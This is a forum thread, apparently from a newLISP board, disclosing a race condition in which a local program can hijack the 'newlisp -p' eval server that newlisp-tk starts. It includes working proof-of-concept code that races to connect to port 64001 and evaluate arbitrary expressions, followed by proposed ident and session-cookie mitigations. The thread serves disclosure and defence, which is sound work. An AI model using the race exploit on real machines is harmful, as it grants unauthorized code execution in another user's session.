newlisp -p security problem

For the Compleat Fan
Locked
Dmi
Posts: 408
Joined: Sat Jun 04, 2005 4:16 pm
Location: Russia
Contact:
Contact Dmi

newlisp -p security problem

Post by Dmi »

try to run following code:

Code: Select all

(set 'host "127.0.0.1" 'port 64001)
(do-until socket
  (set 'socket (net-connect host port)))
(if (and socket (net-receive socket 'str 512))
  (begin
    (print "connected> " str)
    (do-while (net-send socket (append (read-line) "\n"))
      (sleep 1)
      (while (!= (net-peek socket) 0)
        (begin
          (net-receive socket 'str 512)
          (print "got: " str)))
      (print "eval: "))))
(exit)
and, while it is running, try to start newlisp-tk on the same host.
If program above exits silently, try again several times.
If program gives "eval:" prompt, then you gain "newlisp -p" instance started by newlisp-tk:
Try to write lisp expressions...
And check newlisp-tk window - it sucks now.

I can gain shell about 1 of 3-5 tryes...

Problem analysis:
When newlisp-tk starting, it run newlisp -p 64001, then trying to connect to it.
There is some time between newlisp start listen and newlisp-tk send connect to it.
Quite fast malicous program can (statistically) gain race with newlisp-tk.

I think this isn't good... And... it is remotely exploitable too!
I think this functionality must have a strict user authorization (but not by plain passwords ;-) Possible, using randomly generated cookie, known by newlisp and it's client (like X11 magic-cookie) will be sufficient.

But... I think domain sockets will be more useful ;-)
WBR, Dmi
Top
statik
Posts: 58
Joined: Thu Apr 14, 2005 1:12 am

Post by statik »

Good call. I'm not so hot on the cookie idea though... That's just me.
-statik
Top
Dmi
Posts: 408
Joined: Sat Jun 04, 2005 4:16 pm
Location: Russia
Contact:
Contact Dmi

workarounds

Post by Dmi »

As usual, Lutz give the good trick :-)

When newlisp -p started, it begin to interpret the code only after incoming connection is received. So
(net-peer (first (net-sessions)))
will always have return an interactive client ip/port we can then check.

This is the code for local identd-based checking:

Code: Select all

(load "ident.lsp")
(IDENT:auth-local)
ident client context is available here: http://en.feautec.pp.ru/SiteNews/ContextIDENT
... and you need a running identd of course.

And this is possible code for session cookie auth:

Code: Select all

(print "enter session cookie: ")
(if (!= (read-line) "session cookie")  ;-)
  (begin
    (println "session cookie not entered!")
    (exit)))
to use similar code you need to save it in file (say, "netinit.lsp") and then start
$ newlisp -p 12345 netinit.lsp
WBR, Dmi
Top
newdep
Posts: 2038
Joined: Mon Feb 23, 2004 7:40 pm
Location: Netherlands

Post by newdep »

Hello Dmi,

That ident.lsp is a nice one, great job...

Regards, Norman.
-- (define? (Cornflakes))
Top
Locked

Return to “Anything else we might add?”